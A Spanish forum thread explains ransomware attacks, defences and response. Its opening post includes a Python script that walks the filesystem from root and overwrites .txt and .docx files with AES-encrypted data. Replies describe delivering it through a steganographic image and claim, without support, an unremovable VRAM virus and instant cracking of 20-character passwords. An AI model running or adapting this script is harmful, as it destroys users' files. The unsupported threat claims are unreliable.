Ciberseguridad Ransomware, la pesadilla de las empresas **EJEMPLO INSIDE**

  • Autor de tema Autor de tema Miembro eliminado 6516 Jorge2019
  • Fecha de inicio Fecha de inicio
Hola shurmanos

Amigos de lo incierto y los sistemas seguros, volvemos a la carga con los artículos sobre software, ciberseguridad y hacking. En esta ocasión me gustaría hablaros del modelo de ataque más temido por todas las empresas, los ransomware. Hablaremos sobre cómo funcionan estos ataques, daremos una visión periférica de los daños que pueden causar estos ataques, plantearemos formas de evitarlos, cómo gestionar una situación de esta magnitud y finalmente daré un ejemplo de cómo se desarrolla un ransomware (solo es un ejemplo, guarda tu revolver vaquero).

…………………………………………………………………...
Este artículo se publica con fines educativos y prevención de ataques. No me hago responsable de vuestros actos. Se ruega llevar a cabo estos ataques dentro de un entorno de prácticas con máquinas virtuales o laboratorio de hacking. Repito, no me hago responsable de vuestros actos.
………………………………………………………………………….


Los ataques de ransomware son una forma común y peligrosa de hacking en la que el atacante compromete un sistema informático, codifica o elimina los archivos del dispositivo y exige a la víctima pagar un rescate (llamado "ransom") para recuperar acceso a sus datos. En muchos casos, también se realiza una copia de los datos para posteriormente extorsionar a la víctima con la venta de sus datos. Esto conlleva un problema muy grande para las empresas ya que, no solo tienen que lidiar con el ataque ransomware, sino que también deben enfrentarse a las autoridades por haber sido expuestos posibles datos de clientes y la violación de la LOPD.

A continuación expongo un itinerario de actuación por parte del atacante

Infección

El atacante envía un archivo malicioso o hace que el usuario descargue en su dispositivo el malware, ya sea mediante técnicas de phising o por motu propio. En algunos casos estos ataques también los realizan personal interno de las empresas debido a la disconformidad o la razón que considere el atacante.


Ejecución

Cuando se ejecuta el archivo, el ransomware inicia la codificación o eliminación de los archivos del sistema. Como he dicho anteriormente también pueden realizar una copia de los datos para su posterior venta en el mercado negro.


Codificación o eliminación

El ransomware utiliza algoritmos criptográficos para codificar o eliminar los archivos importantes del sistema, como documentos, multimedia, bases de datos, etc. En ocasiones estos algoritmos de codificación suelen ser creados por los atacantes y ello dificulta la recuperación de los datos, pero en otras ocasiones en las que el ransomware no es elaborado, se usan algoritmos conocidos y cabe la probabilidad de recuperación de los datos comprometidos. Sin embargo no podremos gestionar el robo de datos por la cuestión que he mencionado antes, el atacante puede realizar una copia de los datos para su posterior venta.


Exigencia de rescate

La víctima recibe un mensaje que exige el pago de un rescate (ransom) en forma de moneda electrónica, como Bitcoin, a cambio de la clave para descodificar o restaurar los archivos. Este mensaje puede manifestarse durante el ataque y aparecer en forma de aviso en todos los dispositivos comprometidos o puede ser comunicado mediante un email al personal de la empresa. Se ha visto que en ocasiones estos mensajes han sido comunicados mediante redes sociales.



Tipos de ransomware​


Ransomware tradicional: Codifica todos los archivos del sistema y exige el pago de un rescate.

Ransomware avanzado: Elimina los archivos en lugar de codificarlos, lo que hace más difícil la recuperación.

Ransomware con doble efecto: No solo codifica o elimina archivos, sino también intenta comprometer otros dispositivos conectados a la red.



Hagamos un inciso para hablar del ataque con doble efecto.​


El ransomware con doble efecto es un tipo de malware que va más allá de simplemente codificar o eliminar archivos y se enfoca en comprometer otros dispositivos conectados a la red. El malware intenta comprometer otros dispositivos conectados a la red, como servidores, impresoras, escáneres y otros dispositivos IoT (Internet of Things). Aplicando una “infección lateral” se propaga desde el dispositivo inicialmente infectado hasta otros dispositivos en la red, utilizando vulnerabilidades de seguridad o credenciales débiles.

Estrategias de compromiso

1.Exploiting vulnerabilities: El ransomware explota vulnerabilidades conocidas en dispositivos conectados a la red, como servidores o impresoras.

2.Brute-force attacks: El malware aqplica fuerza bruta a credenciales débiles para acceder a otros dispositivos y sistemas.

3.Social engineering: El ransomware utiliza técnicas de ingeniería social para convencer a los usuarios de compartir sus credenciales o permitir el acceso al dispositivo.


Os doy ejemplos de este tipo de ataque con doble efecto:

WannaCry: En 2017, WannaCry fue un ejemplo de ransomware con doble efecto que infectó millones de dispositivos en todo el mundo y comprometió servidores y sistemas operativos.

NotPetya: NotPetya es otro ejemplo de ransomware con doble efecto que se propagó rápidamente a través de la red, comprometiendo servidores y dispositivos IoT.



Consejos para prevenir ataques ransomware​


Actualiza tus software y sistemas operativos: Asegúrate de que estén actualizados con las últimas versiones de seguridad. La mayoría, por no decir todos los sitemas operativos se actualizan semanalmente parcheando vulnerabilidades y haciendo los sistemas más seguros

Usa antivirus y antimalware: Instala un buen antivirus y antimalware en tu dispositivo. Pagar por un buen antivirus puede ahorrarnos disgustos y sobre todo pagar el rescate por los datos comprometidos

Realiza copias de seguridad regulares: Haz backups frecuentes de tus archivos importantes para recuperarlos si algo sale mal. En mis sistemas realizo copias de seguridad diarias con un protocolo automatizado. Esta práctica se lleva a cabo en la mayoría de proveedores de servicio y empresas de alojamiento web. Considera aplicarlo en tu empresa por si las moscas.

No abras correos electrónicos sospechosos: No descargues archivos a menos que estés seguro de su procedencia y contenido. Confirma el dominio desde el que recibes el correo electrónico siempre. También podemos usar software de monitorización de tráfico con filtros de malware, de esta manera podemos localizar la entrada de archivos infectados en nuestra red.

Usa contraseñas fuertes: Utiliza contraseñas complejas y cambia las credenciales periódicamente. Se recomienda usar contraseñas de mínimo treinta caracteres y cambiarlas mensualmente. Cabe la posibilidad de una filtración de credenciales. Con este protocolo de seguridad en las contraseñas, nos aseguramos de que si se han filtrado credenciales, estas ya no tengan validez alguna.



Consejos para prevenir un ataque de ransomware​


No pagues el rescate: No hay garantía de que el atacante te proporcione la clave después del pago.

Realiza una restauración desde backups: Si tienes copias de seguridad, puedes restaurar tus archivos y sistemas operativos a su estado anterior al ataque.

Informa a los autoridades: Reporta el incidente a las autoridades competentes para ayudar a prevenir futuros ataques, aunque muchas empresas son reticentes a esta actuación por no dañar su reputación.


Script de ejemplo de un ransomware​


A continuación os pongo un ejemplo MUY BASICO de cómo es un script de ransomware de pequeña escala. Yo programo con python pero se puede llevar a cabo con cualquier lenguaje de alto nivel. Estas son algunas de las opciones que tenemos a mano usando bibliotecas de python. También podéis desarrollar vuestras propias bibliotecas o frameworks.

**PyCrypto**: Es una biblioteca criptográfica para python que incluye algoritmos criptográficos avanzados como AES, RSA y SHA.

**Pynacl**: Es un paquete de cryptographic bindings for python que proporciona funciones para la codificación y descodificación de datos utilizando algoritmos criptográficos como AES-GCM y HMAC-SHA256.

**PyInstaller**: Es una herramienta que te permite crear ejecutables a partir de tus scripts python, lo que puede ser útil para distribuir tu ransomware en cualquier sistema operativo.

……………………………………………………………………………………………….
No me hago responsable de vuestros actos. Se ruega llevar a cabo estos ataques dentro de un entorno de prácticas con máquinas virtuales o laboratorio de hacking. Repito, no me hago responsable de vuestros actos.
………………………………………………………………………………………………...



Código:
# Importamos la biblioteca os para interactuar con el sistema de archivos
import os

# Importamos la clase AES de la biblioteca PyCryptodome para realizar operaciones de cifrado
from Crypto.Cipher import AES

# Configuración para el cifrado
# La clave y el vector de inicialización deben ser bytes y tener una longitud adecuada para AES (16, 24, o 32 bytes para la clave, 16 bytes para el vector)
Config = {
    'key': b'aquí tu llave secreta',
    'iv': b'aquí tu vector de inicialización'
}

# Definimos una función para cifrar un archivo
def encrypt_file(file_path):
    # Abrimos el archivo en modo binario para lectura
    with open(file_path, 'rb') as file:
        data = file.read()  # Leemos los datos del archivo
   
    # Creamos un nuevo objeto de cifrado AES en modo CBC (Cipher Block Chaining)
    cipher = AES.new(Config['key'], AES.MODE_CBC, Config['iv'])
   
    # La longitud de los datos debe ser múltiplo del tamaño del bloque (16 bytes) para el cifrado en modo CBC
    # Por lo tanto, debemos rellenar los datos si no lo son
    padded_data = data + b' ' * (16 - len(data) % 16)
   
    # Ciframos los datos rellenos
    encrypted_data = cipher.encrypt(padded_data)
   
    return encrypted_data  # Devolvemos los datos cifrados

# Definimos una función que simula un ataque de ransomware
def ransomware_attack():
    # Recorremos el sistema de archivos desde la raíz (esto puede ser peligroso en un entorno real)
    for root, dirs, files in os.walk('/'):
        for file in files:
            # Comprobamos si el archivo tiene una extensión específica (en este caso .txt o .docx)
            if file.endswith('.txt') or file.endswith('.docx'):
                file_path = os.path.join(root, file)  # Obtenemos la ruta completa del archivo
                print(f'Codificando archivo: {file}')  # Informamos que el archivo está siendo cifrado
               
                # Ciframos el archivo y obtenemos los datos cifrados
                encrypted_data = encrypt_file(file_path)
               
                # Sobrescribimos el archivo original con los datos cifrados
                with open(file_path, 'wb') as file:
                    file.write(encrypted_data)

# Punto de entrada del script
if __name__ == '__main__':
    ransomware_attack()




Explicación del Script​

  1. Importaciones y Configuración:
    • import os: Permite recorrer el sistema de archivos.
    • from Crypto.Cipher import AES: Permite utilizar el cifrado AES (Advanced Encryption Standard).
    • Config: Diccionario que contiene la clave y el vector de inicialización para el cifrado. Estos valores son esenciales para cifrar y descifrar correctamente los datos.
  2. Función encrypt_file(file_path):
    • Abre un archivo en modo lectura binaria y lee su contenido.
    • Crea un objeto de cifrado AES en modo CBC utilizando la clave y el vector de inicialización.
    • Los datos del archivo se rellenan para asegurar que su longitud es múltiplo del tamaño del bloque de AES (16 bytes).
    • Los datos rellenados se cifran y se devuelven.
  3. Función ransomware_attack():
    • Recorre el sistema de archivos desde la raíz.
    • Para cada archivo encontrado, verifica si la extensión es .txt o .docx.
    • Cifra el archivo seleccionado y sobrescribe el archivo original con los datos cifrados.
  4. Bloque principal:
    • Si el script se ejecuta directamente, se llama a la función ransomware_attack().

No voy a poner de nuevo el aviso de este artículo educativo porque sería repetitivo, pero si os voy a recomendar que no seáis gilipollas. Este tipo de ataques te pueden mandar a una bonita celda desde la que no podrás hablar con los shurmanos del foro.

Espero que este artículo te haya gustado y hayas aprendido cómo defender tus sistemas de un ataque ransomware y cómo lidiar en caso de ser víctima de uno de estos ataques. Si consideras el artículo incompleto, te ruego dejes tu aportación en los comentarios del hilo para que el resto de shurmanos aprendamos un poco más si cabe. Muchas gracias por leer y ser fiel a mis artículos y al subforo de tecnología.

Para finalizar os dejo una cita que me gusta decir a mis clientes:

"Prevenir es mejor que curar. Anticiparse es la mejor defensa."

Ale
a correr
 
cuando termine los deberes me lo leo q bendición
 
Solo te falta detallar un punto cuando hablas de la LOPD, y es que si juankean a un organismo del gobierno robando los datos de 35 millones de Españoles no hay ningún responsable, ni consecuencia ni compensación


Los de la DGT:
Mr Rogers Clown GIF
 
¿Cómo haces para crear un tema de forma que se ve el autor al final? ¿Sois de alguna logia especial? :roto2:
 
Solo te falta detallar un punto cuando hablas de la LOPD, y es que si juankean a un organismo del gobierno robando los datos de 35 millones de Españoles no hay ningún responsable, ni consecuencia ni compensación


Los de la DGT:
Mr Rogers Clown GIF
Con eso se demuestra la importancia de los datos expuestos
No les importamos nada
 
Con eso se demuestra la importancia de los datos expuestos
No les importamos nada
Y mientras tanto a pagar impuestos entre todos para pagar el secuestro del ransomware que afecto al movil de presi y que Marruecos no saque a la luz su mierda
 
Había leído hace algún tiempo que hay criminales que venden suscripciones a software de ransomware (ransomware as a service), de forma que ni siquiera hay que saber mucho de informática para llevar a cabo una de esas extorsiones.

Estaba pensando que los modelos pequeños de IA deberían hacer posible que el ransomware sea más inteligente, simplemente diciéndole que busque información comprometida, detalles bancarios o de lo que sea.

➡️ Ransomware como servicio
 
Hola @Jorge2019 , como siempre, muy interesante. Yo tengo una pregunta, que puede parecer estúpida...pero, ¿Qué parámetros van en el punto de entrada del script? Quiero decir, ¿Cuál es el método habitual? Entrada por ip? por puertos?
 
Muy bien explicado el hilo, yo ya conocía lo que es el ransomware, a día de hoy considero que estamos en la época dorada del hackeo y cualquier paso en falso te puede condenar, siempre he utilizado solamente Windows Defender que es bastante eficaz, pero decidí hace dos meses hacer una conjunta de Malwarebytes con varios colegas y sale muy asequible, me gusta bastante cómo protege y se puede usar a la vez con Defender.

También tengo varias extensiones de navegador como el bloqueador de anuncios predeterminado de Opera GX, Ublock Origin, Browser Guard, LocalCDN y alguno más me dejo, al menos así me aseguro de tener varias pequeñas capas de seguridad.
 
Hilazo shur, gracias por la info.

Tengo una duda tu que estas dentro del mundillo,

¿Por que todos los ataques o la mayoria empiezan por fallo humano? Clikar donde no toca, un correo suplantando una identidad, etc...

Es que me sorprende que empresas grandes (no Pacos SL) sufran este tipo de ataques. O la gente es muy down o les falta formación supongo @Jorge2019
 
Hilazo shur, gracias por la info.

Tengo una duda tu que estas dentro del mundillo,

¿Por que todos los ataques o la mayoria empiezan por fallo humano? Clikar donde no toca, un correo suplantando una identidad, etc...

Es que me sorprende que empresas grandes (no Pacos SL) sufran este tipo de ataques. O la gente es muy down o les falta formación supongo @Jorge2019
Es el eslabón mas débil de la cadena. La seguridad avanzó tanto, que es mejor invertir en "materia social". Sencillo y a la vez efectivo.
 
Es el eslabón mas débil de la cadena. La seguridad avanzó tanto, que es mejor invertir en "materia social". Sencillo y a la vez efectivo.
Tengo ideas muy mínimas shur, es mucho más difícil que entrar "a la fuerza"?

Joder, yo no tengo ninguna formación oficial con la informática, pero en el curro por ejemplo siempre voy con mil ojos (y estoy todo el día liado con correos) y nunca he tenido un susto.
 
Tengo ideas muy mínimas shur, es mucho más difícil que entrar "a la fuerza"?

Joder, yo no tengo ninguna formación oficial con la informática, pero en el curro por ejemplo siempre voy con mil ojos (y estoy todo el día liado con correos) y nunca he tenido un susto.
Es genial que vayas con cuidado. La mayoría de usuarios no lo hacen. También es verdad, que la gente no es realmente consciente de lo que hace en internet, y de como y por que se expone o está expuesta....Es una lástima que no se entienda.

Los ataques por "fuerza bruta" son menos frecuentes, puesto que fueron los primeros diría yo, aunque que me corrija sensei @Jorge2019 , hay más medios para detectarlos a día de hoy y frenarlos por ende, por ejemplo, MFA (multi factor), bloqueos de usuarios por varios fallos al introducir contraseñas, complejidad de las contraseñas etc....
 
Es genial que vayas con cuidado. La mayoría de usuarios no lo hacen. También es verdad, que la gente no es realmente consciente de lo que hace en internet, y de como y por que se expone o está expuesta....Es una lástima que no se entienda.

Los ataques por "fuerza bruta" son menos frecuentes, puesto que fueron los primeros diría yo, aunque que me corrija sensei @Jorge2019 , hay más medios para detectarlos a día de hoy y frenarlos por ende, por ejemplo, MFA (multi factor), bloqueos de usuarios por varios fallos al introducir contraseñas, complejidad de las contraseñas etc....

Soy consciente del peligro que puede tener internet shur. Y en la empresa pues tengo responsabilidades grandes, no puedo permitirme fallar.

¿Podrías tu o @Jorge2019 dar algunos consejos de como evitar el pishing? Yo simplemente reviso bien la dirección web, utilizo VPN y no acepto correos de direcciones que no conozca o seguras, entre otras cosas. No se si se podria poner una capa mas de "seguridad".
 
Soy consciente del peligro que puede tener internet shur. Y en la empresa pues tengo responsabilidades grandes, no puedo permitirme fallar.

¿Podrías tu o @Jorge2019 dar algunos consejos de como evitar el pishing? Yo simplemente reviso bien la dirección web, utilizo VPN y no acepto correos de direcciones que no conozca o seguras, entre otras cosas. No se si se podria poner una capa mas de "seguridad".
Revisar la dirección de correo es esencial,
No aceptar correos de direcciones que no conozcas, puede ser una solución super eficaz, pero un poco tediosa.
Cuando un conocido te manda un enlace, al poner el mouse encima, puedes ver la dirección de dicho vinculo, para mi es de vital importancia.
Nunca ingresar tus credenciales en lugares donde no estés seguro 100% que es la página real.
No usar el típico iniciar sesión con google o con facebook o con instagram
Plataformas de correo como Office 365 tienen un filtrado de correo activo, y adicionalmente se pueden añadir cosas como IronScales, que es un anti-phising
El uso de VPN está enfocado para otro tipo de problemas.

En resumen, una regla no escrita es que todo avance para la comodidad del usuario, va en detrimento de la seguridad en red.
 
Revisar la dirección de correo es esencial,
No aceptar correos de direcciones que no conozcas, puede ser una solución super eficaz, pero un poco tediosa.
Cuando un conocido te manda un enlace, al poner el mouse encima, puedes ver la dirección de dicho vinculo, para mi es de vital importancia.
Nunca ingresar tus credenciales en lugares donde no estés seguro 100% que es la página real.
No usar el típico iniciar sesión con google o con facebook o con instagram
Plataformas de correo como Office 365 tienen un filtrado de correo activo, y adicionalmente se pueden añadir cosas como IronScales, que es un anti-phising
El uso de VPN está enfocado para otro tipo de problemas.

En resumen, una regla no escrita es que todo avance para la comodidad del usuario, va en detrimento de la seguridad en red.
Tomo nota de todo. Aunque admito que en mi ordenador personal de casa (El Bunker lo llamo) si que he pecado en alguna ocasión de iniciar sesión con Google. Como podría acarrear esto problemas?

El resto es algo que hacía desde que tengo uso de razón. Bajo mi punto de vista es algo que se debería impartir en los colegios a los crios, el saber donde se meten y las responsabilidades que ello conlleva.

Sisi, la VPN la tengo en casa para poder ver cosas en Netflix y otros asuntos, que estoy un poco capado. Pero por si servía de algo :nusenuse:
 
Tomo nota de todo. Aunque admito que en mi ordenador personal de casa (El Bunker lo llamo) si que he pecado en alguna ocasión de iniciar sesión con Google. Como podría acarrear esto problemas?

El resto es algo que hacía desde que tengo uso de razón. Bajo mi punto de vista es algo que se debería impartir en los colegios a los crios, el saber donde se meten y las responsabilidades que ello conlleva.

Sisi, la VPN la tengo en casa para poder ver cosas en Netflix y otros asuntos, que estoy un poco capado. Pero por si servía de algo :nusenuse:
El iniciar sesión con google, es una autenticación SSO, o single sign on.
Esto significa que con una sola cuenta inicias sesión en muchos sitios. Como te dije, más cómodo para el usuario, menos seguro. Si no tienes esa cuenta protegida con 2FA, si acceden a esa cuenta, pueden acceder a todas las páginas en las que hayas configurado SSO, o iniciado sesión. Casi siempre es mejor tener cuentas independientes con su correspondiente 2FA. Si entran en una cuenta, solo has expuesto una cuenta, no todas.

A parte de este motivo que te acabo de dar, algún compi de seguridad me comentó en su momento que había algunos SSO, que hacían cosas raras con los credenciales, o guardaban tokens donde no debían.

Bajo mi punto de vista, también se debería de impartir una parte al menos, un conocimiento básico, y no tantas tonterías....pero el tema de la educación es otro tema que telita.

A pesar de todo, eres de los usuarios con más conciencia que he conocido, y créeme, llevo miles a las espaldas.
 
Hola @Jorge2019 , como siempre, muy interesante. Yo tengo una pregunta, que puede parecer estúpida...pero, ¿Qué parámetros van en el punto de entrada del script? Quiero decir, ¿Cuál es el método habitual? Entrada por ip? por puertos?
el script se entrega a la víctima como un ejecutable
te pongo un ejemplo
alteramos una foto con esteganografía
de tal manera que la víctima al abrir la foto para verla ejecuta el script
la función "encrypt_file(file_path)" puede empezar encriptando los archivos del sistema
he respondido a tu pregunta?
 
Muy bien explicado el hilo, yo ya conocía lo que es el ransomware, a día de hoy considero que estamos en la época dorada del hackeo y cualquier paso en falso te puede condenar, siempre he utilizado solamente Windows Defender que es bastante eficaz, pero decidí hace dos meses hacer una conjunta de Malwarebytes con varios colegas y sale muy asequible, me gusta bastante cómo protege y se puede usar a la vez con Defender.

También tengo varias extensiones de navegador como el bloqueador de anuncios predeterminado de Opera GX, Ublock Origin, Browser Guard, LocalCDN y alguno más me dejo, al menos así me aseguro de tener varias pequeñas capas de seguridad.
buen trabajo shur
mantente alerta de todas formas
hay malware que aún se está estudiando como funciona
desde 2021 se viene estudiando un virus que se aloja en la vram de las tarjetas gráficas y es casi imposible despegarlo
 
Hilazo shur, gracias por la info.

Tengo una duda tu que estas dentro del mundillo,

¿Por que todos los ataques o la mayoria empiezan por fallo humano? Clikar donde no toca, un correo suplantando una identidad, etc...

Es que me sorprende que empresas grandes (no Pacos SL) sufran este tipo de ataques. O la gente es muy down o les falta formación supongo @Jorge2019
una máquina nunca va a fallar, a no ser que esté programada para hacerlo
por lo que el atacante siempre va a depender del fallo humano para infectar o penetrar un sistema
ya sea por credeciales flojas, phising o cualquier otra técnica de ingeniería social
los humanos somos el eslabón más débil
 
Tengo ideas muy mínimas shur, es mucho más difícil que entrar "a la fuerza"?

Joder, yo no tengo ninguna formación oficial con la informática, pero en el curro por ejemplo siempre voy con mil ojos (y estoy todo el día liado con correos) y nunca he tenido un susto.
Es genial que vayas con cuidado. La mayoría de usuarios no lo hacen. También es verdad, que la gente no es realmente consciente de lo que hace en internet, y de como y por que se expone o está expuesta....Es una lástima que no se entienda.

Los ataques por "fuerza bruta" son menos frecuentes, puesto que fueron los primeros diría yo, aunque que me corrija sensei @Jorge2019 , hay más medios para detectarlos a día de hoy y frenarlos por ende, por ejemplo, MFA (multi factor), bloqueos de usuarios por varios fallos al introducir contraseñas, complejidad de las contraseñas etc....
los ataques con fuerza fruta no siempre son efectivos
muchas plataformas bloquean el acceso al login despues de varios intentos de autenticación
sin embargo, cuando eso no ocurre, estamos vendido al atacante
un juanker con una buena tarjeta gráfica es capaz de forzar una contraseña de veinte caracteres en cuestión de segundos
por eso dependemos tanto de la seguridad de las plataformas, tienen que estar bien diseñadas
a la hora de desarrollar una aplicación hay que tener en cuenta que son tus conocimientos en programación los que van a hacer un código seguro
yo he aprendido eso a base de hostias
 
buen trabajo shur
mantente alerta de todas formas
hay malware que aún se está estudiando como funciona
desde 2021 se viene estudiando un virus que se aloja en la vram de las tarjetas gráficas y es casi imposible despegarlo
Desconocía lo de ese virus, ¿tienes fuente de ello?
 
Soy consciente del peligro que puede tener internet shur. Y en la empresa pues tengo responsabilidades grandes, no puedo permitirme fallar.

¿Podrías tu o @Jorge2019 dar algunos consejos de como evitar el pishing? Yo simplemente reviso bien la dirección web, utilizo VPN y no acepto correos de direcciones que no conozca o seguras, entre otras cosas. No se si se podria poner una capa mas de "seguridad".
aprende sobre las tácticas de phishing y mantente alerta
revisa el dominio desde el que recibes el email o nº de teléfono desde el que recibes el sms o el whastapp
revisa si hay errores en los mensajes, ya que los atacantes a menudo cometen errores ortográficos o mala traducción, suelen ser extranjeros
utiliza contraseñas fuertes y cámbialas regularmente
no hagas clic en enlaces sospechosos y ten cuidado con los archivos adjuntos, por lo general los servicios de correo actuales tienen la función de reconocer un email sospechoso de phising
usa software de seguridad actualizado y no te fies mucho de Windows defender
confirma la autenticidad de los mensajes y sitios web, muchas plataformas no te piden credenciales así como así y confirman tu identidad mediante 2FA con sms
autenticación de dos factores (2FA), activa siempre que sea posible esta función para una capa adicional de seguridad, es jodidamente esencial
 
Desconocía lo de ese virus, ¿tienes fuente de ello?
yo soy la fuente
me pasó el año pasado por querer instalar un programa de producción de música pirata

tengo una gtx 1650 de nvidia

pasé el ejecutable por 3 antivirus y no detectó nada de nada
 
yo soy la fuente
me pasó el año pasado por querer instalar un programa de producción de música pirata

tengo una gtx 1650 de nvidia

pasé el ejecutable por 3 antivirus y no detectó nada de nada
Gracias shur, es increíble lo que pueden llegar a desarrollar, ¿se solucionaría también formateando? A mí me ha llegado a ocurrir que buscando alguna cosa pirata el .exe cargue pero no haga absolutamente nada (bueno, está claro que sí que lo está haciendo sin que te des cuenta) y acto seguido sin perder ningún minuto formateo.
 
Gracias shur, es increíble lo que pueden llegar a desarrollar, ¿se solucionaría también formateando? A mí me ha llegado a ocurrir que buscando alguna cosa pirata el .exe cargue pero no haga absolutamente nada (bueno, está claro que sí que lo está haciendo sin que te des cuenta) y acto seguido sin perder ningún minuto formateo.
qué va shur
ni formateando, ni reinstalando el so
de momento no se ha encontrado cura para eso, queyo tenga conocimiento
y es un virus del 2021
 
qué va shur
ni formateando, ni reinstalando el so
de momento no se ha encontrado cura para eso, queyo tenga conocimiento
y es un virus del 2021
Ufff, eso sí es un problema desde luego, hay que ir con mucho cuidado...
 
El tema del 2FA es ESENCIAL. Y pongo un ejemplo. Imagina que quieres meterte en la página de tu banco a ver si te han ingresado la paga extra y de alguna manera logran colarte una página igual que la del banco, vamos, un phising de toda la vida. Metes tu usuario y contraseña y la página falsa solo te dice que la contraseña es incorrecta y entonces te redirige a la página real del banco. Tú solo pensarías que has metido mal la contraseña y te olvidarías del tema. Y el cabrón que ha creado esa página tendría tus credenciales para entrar a tu cuenta del banco. Pero si tienes habilitada la 2FA daría igual porque no tendría tu móvil para continuar el login.

Vale, para sacarte la pasta necesitaría una segunda contraseña, la "firma digital", pero vamos, que lo importante era explicar por qué 2FA previene cosas como esta. Porque mucha gente piensa que por ver el candado en el navegador la página ya es segura, y lo único que significa es que el dominio de la página (lo que aparece en la dirección) es el mismo que se ve y no está falseado, como puede pasar en los correos electrónicos. Pero mucha gente solo mira que haya candado, no la url.
 
Última edición:
Volver
Arriba